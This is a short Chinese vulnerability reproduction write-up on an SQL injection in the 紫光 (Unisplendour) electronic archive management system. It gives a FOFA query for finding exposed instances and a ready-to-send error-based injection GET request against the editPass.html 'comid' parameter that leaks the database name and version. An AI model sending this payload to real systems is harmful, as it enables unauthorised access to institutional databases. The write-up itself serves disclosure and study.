文章目录
- 紫光电子档案管理系统存在SQL注入漏洞(漏洞复现)
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响范围
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
紫光电子档案管理系统存在SQL注入漏洞(漏洞复现)
0x01 前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!
0x02 漏洞描述
紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
0x03 影响范围
紫光电子档案管理系统
0x04 漏洞环境
fofa:“紫光档案管理系统”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (GET)
GET /login/Login/editPass.html?comid=extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
3.复现
输入上面的数据包,得到回显(当前数据库名以及版本号)
